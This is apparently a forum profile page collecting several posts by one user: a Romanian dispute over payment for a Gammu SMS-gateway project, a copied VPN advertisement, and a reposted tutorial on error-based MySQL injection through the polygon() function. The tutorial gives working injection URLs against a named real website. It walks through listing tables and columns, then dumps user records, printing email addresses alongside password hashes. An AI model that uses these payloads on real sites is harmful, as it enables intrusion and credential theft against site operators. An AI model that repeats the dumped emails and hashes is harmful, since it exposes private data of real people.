Jump to content

nacks

Active Members
 View Profile  See their activity

  • Posts

    415

  • Joined

  • Last visited

  • Days Won

    2

 Content Type 

Posts posted by nacks

  5. Nacks - tepar ?

    in Off-topic

    Posted

    ... vrei sa pun si log'ul cand ai zis ca nu mai faci nimic si nu mai vrei nimic si ca iti bagi pwla??? ... haide las o asa cum a picat ... pe jabber nu am mai intrat de ceva timp ptc nu pot!

    TC din pct meu de vedere!

  6. Nacks - tepar ?

    in Off-topic

    Posted

    nacks@jabber.de (Apr 16, 2015 11:23 AM)

    Daca ruleaza scriptul ala receive.py si tu incerci sa trimiti mesaje nu merge ... modemul nu poate procesa doua taskuri in acelasi timp ...

    nacks@jabber.de (Apr 16, 2015 11:24 AM)

    Trebuie sa ai noroc sa prinzi modemul liber in timp ce nu are nici o interogare pe el

    nacks@jabber.de (Apr 16, 2015 11:24 AM)

    Si din 50 de mesaje trimite jumate

    nacks@jabber.de (Apr 16, 2015 11:24 AM)

    Daca punem la 5 secunde ... nu ti mai trimite nimic :|

    nacks@jabber.de (Apr 16, 2015 6:30 PM)

    La numere esuate nu scrie corect numarul

    nacks@jabber.de (Apr 16, 2015 6:30 PM)

    Scrie doar o parte din el

    nacks@jabber.de (Apr 16, 2015 6:30 PM)

    ...

    nacks@jabber.de (Apr 17, 2015 11:57 PM)

    Pai cred ca ai vazut toate mesajele alea

    nacks@jabber.de (Apr 17, 2015 11:57 PM)

    In primul rand platforma web nu e ok

    nacks@jabber.de (Apr 17, 2015 11:58 PM)

    Nu foloseste ce db trebuie

    nacks@jabber.de (Apr 17, 2015 11:58 PM)

    Nu inporta corect

    nacks@jabber.de (Apr 17, 2015 11:58 PM)

    Si nu se conecteaza unde trebuie

    nacks@jabber.de (Apr 17, 2015 11:58 PM)

    Nu trebuie rulat niciun script pt a citi mesaje

    nacks@jabber.de (Apr 17, 2015 11:59 PM)

    Asta face modemul pri push

    nacks@jabber.de (Apr 17, 2015 11:59 PM)

    ... il fac eu sau il faceti voi ... ?

    nacks@jabber.de (Apr 18, 2015 12:00 AM)

    Platforma e plina de erori ... am scris un script php pt a redirectiona paginile cu erori ptc contineau cookie :|

    jonycash1337@jabber.at (Apr 18, 2015 12:00 AM)

    adica ca sa citesc mesajele nu trebuie sa rulez script nimic?

    jonycash1337@jabber.at (Apr 18, 2015 12:03 AM)

    pai sa ii zic lu asta sa repare ce o facut el

    nacks@jabber.de (Apr 18, 2015 12:03 AM)

    Trebuia importate tabelele

    jonycash1337@jabber.at (Apr 18, 2015 12:03 AM)

    daca nu vrea sa mai faca nimic pana acuma

    nacks@jabber.de (Apr 18, 2015 12:03 AM)

    Le am importat eu ca pica gammu smsd

    nacks@jabber.de (Apr 18, 2015 12:03 AM)

    Uita te in log

    nacks@jabber.de (Apr 18, 2015 12:04 AM)

    Voi dupa ce ati facut platforma ati verificat log ?

    nacks@jabber.de (Apr 18, 2015 12:04 AM)

    Este plin de erori

    jonycash1337@jabber.at (Apr 18, 2015 12:04 AM)

    in php stiu

    jonycash1337@jabber.at (Apr 18, 2015 12:04 AM)

    el a pus error_reporting 0

    jonycash1337@jabber.at (Apr 18, 2015 12:04 AM)

    si atat

    jonycash1337@jabber.at (Apr 18, 2015 12:05 AM)

    sii sa isi repare erorile daca nu mai vrea sa faca nimic in plus

    nacks@jabber.de (Apr 18, 2015 12:05 AM)

    Daca gammu nu gasea tabelul inbox pica si nu mai rula smsrd

    jonycash1337@jabber.at (Apr 18, 2015 12:05 AM)

    pfaiii

    jonycash1337@jabber.at (Apr 18, 2015 12:05 AM)

    pai deja pica 50% din ce o facut

    nacks@jabber.de (Apr 18, 2015 12:06 AM)

    Pica tot

    nacks@jabber.de (Apr 18, 2015 12:06 AM)

    El trebuia sa faca aplicatia dupa schema gammu

    nacks@jabber.de (Apr 18, 2015 12:06 AM)

    Care trebuia inportata imitial

    jonycash1337@jabber.at (Apr 18, 2015 12:06 AM)

    mda aici o fost vina mea ca nu am stiut ca gammu are tabele alea

    jonycash1337@jabber.at (Apr 18, 2015 12:07 AM)

    ca ii ziceam sa faca expre pentru aia

    nacks@jabber.de (Apr 18, 2015 12:07 AM)

    Trebuie facuta aplicatia doar in functie de db gammu

    nacks@jabber.de (Apr 18, 2015 12:07 AM)

    Si merge perfect ...

    nacks@jabber.de (Apr 18, 2015 12:08 AM)

    Apoi tu doar trebuie sa scri un script si sa i dai calea cartre el

    nacks@jabber.de (Apr 18, 2015 12:08 AM)

    Te ai complicat prea mult

    nacks@jabber.de (Apr 18, 2015 12:09 AM)

    Poti sa ti pui numarul in run.sh si sa testezi

    jonycash1337@jabber.at (Apr 18, 2015 12:09 AM)

    ok ma uit acolo in run.sh

    nacks@jabber.de (Apr 18, 2015 12:09 AM)

    Cand primeste sms ruleaza ce script vrei tu

    nacks@jabber.de (Apr 18, 2015 12:11 AM)

    Trebuie doar sa selecteze contactele si sa filtreze numarul de la care primeste sms

    nacks@jabber.de (Apr 18, 2015 12:12 AM)

    Vizavi de bani ... nu am trimis nimic ptc nu este ok nimic la acest moment ... din pacate

    jonycash1337@jabber.at (Apr 18, 2015 12:13 AM)

    pai la send nu e bine?

    jonycash1337@jabber.at (Apr 18, 2015 12:13 AM)

    din web?

    nacks@jabber.de (Apr 18, 2015 12:13 AM)

    Nu

    jonycash1337@jabber.at (Apr 18, 2015 12:13 AM)

    pai acolo ce nu merge?

    nacks@jabber.de (Apr 18, 2015 12:13 AM)

    Ptc nu foloseste db gammu

    nacks@jabber.de (Apr 18, 2015 12:13 AM)

    Care face log complex

    nacks@jabber.de (Apr 18, 2015 12:14 AM)

    Uita te putin acum in mysql

    nacks@jabber.de (Apr 18, 2015 12:14 AM)

    Sa vezi cum arata db

    nacks@jabber.de (Apr 18, 2015 12:15 AM)

    Pe mine ma intereseaza ca aplicatia web sa fie bazata pe schema gammu

    nacks@jabber.de (Apr 18, 2015 12:15 AM)

    Nu pe niste tabele la intamplare

    nacks@jabber.de (Apr 18, 2015 12:15 AM)

    Era mult mai simplu si pt el asa

    jonycash1337@jabber.at (Apr 18, 2015 12:15 AM)

    nu stiam de la inceput bre ca nu e bine asa , acuma trebuie sa termin literalmente tot singur si sa il mai platesc si pe ala pt ce a facut/nefacut

    jonycash1337@jabber.at (Apr 18, 2015 12:16 AM)

    fuck

    nacks@jabber.de (Apr 18, 2015 12:16 AM)

    Ai vrut sa ma ajuti ... dar uite ca nu v ati documentat de ajuns

    jonycash1337@jabber.at (Apr 18, 2015 12:17 AM)

    mda

    nacks@jabber.de (Apr 18, 2015 12:17 AM)

    Sincer mi l fac singur acum cand am vazut cat de simplu este si cate stie sa faca gammu

    nacks@jabber.de (Apr 18, 2015 12:17 AM)

    Dar am vb ceva cu tine si nu sunt fara obraz

    jonycash1337@jabber.at (Apr 18, 2015 12:17 AM)

    of

    nacks@jabber.de (Apr 18, 2015 12:17 AM)

    Dar vreau sa iasa ce trebuie ...

    nacks@jabber.de (Apr 18, 2015 12:19 AM)

    Adica aplicatia web bazata pe baza de date gammu si cu tot ce se poate scoate din schema aia

    nacks@jabber.de (Apr 18, 2015 12:19 AM)

    Si apoi fwd care il faci f simplu prin runonreceive =

    nacks@jabber.de (Apr 18, 2015 12:19 AM)

    Asta e tot

    jonycash1337@jabber.at (Apr 18, 2015 12:20 AM)

    da....

    nacks@jabber.de (Apr 18, 2015 12:20 AM)

    In scriptul respectiv trebuie doar sa faci selectie din contacte si filtrare de numar

    ... cred ca este destul!!!

  7. Nacks - tepar ?

    in Off-topic

    Posted

    @askwrite nu sunt Dany ... (daca din toate discutiile nu ti ai dat seama ... este grav!!!)

    SilenTx0 are dreptate. Dany da bacul si are de invatat ... de aici s a rupt cam totul, dar nu asta este problema platii.

    Nu este TEAPA! ... te rog termina cu aberatiie astea.

    Trebuia sa explici cam ce "proiect"ai facut tu ... cat anume ai realizat din el si cat de mult te ai mulat pe cerinte!!!

    Dany ti a zis ceva, eu ti am explicat de ce am nevoie ... si ce a iesit?!? ... cand ti am spus initial ca vor fi multe modificari pana cand este gata ai zis OK ... cand a inceput sa vomite erori ai zis ca nu te pricepi la linux ... mi e cam sila sa scriu aici tot ce am vorbit! ...

    Despre Gammu habar nu aveai ... nici macar ca are DB si ca sunt create tabele deja ... ai folosit ceva facut de tine care nu functiona normal ... aveam erori in pagina creata de tine ...

    Nu mai spun ca ati creat un script care bloca stick'ul ... care nu era necesar ptc facea push automat ... s.a.m.d

    Majoritatea erorilor si ideilor au venit de la mine! Corect ?!?

    Deci ... PENTRU CE BANI ? haide sa fim putin mai seriosi!

    Te rog sa te gandesti de doua ori pana sa postezi de disperare aici!

    MS

  20. You have SQLi in your polygons

    in Securitate web

    Posted

    This method based on the function polygon().

    In a nutshell, this function constructs geometry collection.

    The vuln thing about it, that it can only work with the function point().

    For example:

    SELECT polygon(point(53,12));

    And the output is a bunch of ???'s.

    Not really exciting, ah ?

    For those who know a bit geometry, it goes like point(x,y).

    Now look whats happend when we dont use point().

    SELECT polygon(53,12);
    Error 1367 (22007): Illegal non geometric '53' value found during parsing

    yF2L4lm.png

    We get an error on our x argument, 53.

    So lets think a bit.

    If the error returns our string input as an string output, what would happend if we try to run a query ?

    SELECT polygon((select*from(select*from(select@@version)f)x));
    Error 1367 (22007): Illegal non geometric '(select `x`.`@@version` from (select '5.5.38-35.2' AS `@@version` from dual) `x`)' value found during parsing

    Boom ! 5.5.38-35.2

    AuWb3Pg.png

    Now lets try that on a real site.

    Conditions:

    mysql_error on.

    Lets get the version:

    http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from(select@@version)f)x))

    5.1.73-log

    ltJUkJH.png

    Nice, but can we extract more ?

    Hell yeah.

    We will be using this to get tables:

    http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from(select group_concat(table_name) from information_schema.tables where table_schema=database())f)x))

    blocklist,log_login,pernodmajorwinners,pernodmanagement,pernodmatches,pernodmess?ages,pernodnews,pernodpolls,pernodtopics,pernoduser

    znylQXa.png

    Im interested in the table pernoduser, lets get columns:

    http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from(select group_concat(column_name) from information_schema.columns where table_name='pernoduser' )f)x))

    pernodid,nickname,fullname,forumname,password,email,handicap,p_dbl,p_sgl,login,forumnotify,deleted

    mpUmyDy.png

    And dump the table:

    http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from(select group_concat(email,0x3a,password) from pernoduser)f)x))

    and.rogers@tiscali.co.uk:22fdf94cc29e7aff8ece472ed119c53e,butters65@hotmail.co.u?k:795b087b2ceb3482dc9956eb8f126ea3

    FT2QqJ4.png

    And we get the data.

    To overpower the 'cut results', we can just add a condition in the end, " where email>last-email ".

    Hope you learned something !

    Sursa: HF + Frostyhacks

    • Upvote 2

  21. FrootVPN - Free

    in Free stuff

    Posted

    What is FrootVPN?

    FrootVPN is a VPN tunneling service which creates a secure and anonymous connection to the internet.

    What Operating systems and Devices does FrootVPN support?

    FrootVPN works on all Windows and Unix/Linux systems, Iphone, Ipad and Android devices. You can also get it to work on your home router as long as it has VPN support.

    Do you keep logs?

    We don't keep any logs of any kind. All we ask from you is your email address and username. No other information is kept on our servers.

    Where are your servers located?

    Our servers are located in Sweden and we operate under Swedish law which offers high internet privacy.

    Do you keep ANY logs which would allow you or a 3rd party to match an IP-address and a time stamp to a user of your service?

    We don't store any kind of data logs on our servers. The VPN user is assigned a new dynamic IP every time he connects to FrootVPN. There is even no time stamp or logs of which IP-address you got assigned.

    Frootvpn

×
×
  • Create New...